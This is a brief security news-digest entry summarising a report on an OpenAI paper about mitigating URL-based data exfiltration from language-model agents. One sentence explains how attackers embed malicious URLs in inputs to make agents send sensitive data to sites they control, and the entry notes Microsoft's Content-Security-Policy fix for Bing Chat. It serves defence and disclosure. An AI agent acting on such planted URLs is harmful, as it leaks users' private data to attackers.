AI Sec Watch: A Security Intelligence Platform for AI Systems

Luu, T.J.

OpenAI Explains URL-Based Data Exfiltration Mitigations in New Paper

infonewsLLM-Specific

securityresearch

Source: Embrace The RedFebruary 5, 2026

Summary

OpenAI published a paper describing new mitigations for URL-based data exfiltration (a technique where attackers trick AI agents into sending sensitive data to attacker-controlled websites by embedding malicious URLs in inputs). The issue was originally reported to OpenAI in 2023 but received little attention at the time, though Microsoft implemented a fix for the same vulnerability in Bing Chat.

Solution / Mitigation

Microsoft applied a fix via a Content-Security-Policy header (a security rule that controls which external resources a webpage can load) in May 2023 to generally prevent loading of images. OpenAI's specific mitigations are discussed in their new paper 'Preventing URL-Based Data Exfiltration in Language-Model Agents', but detailed mitigation methods are not described in this source text.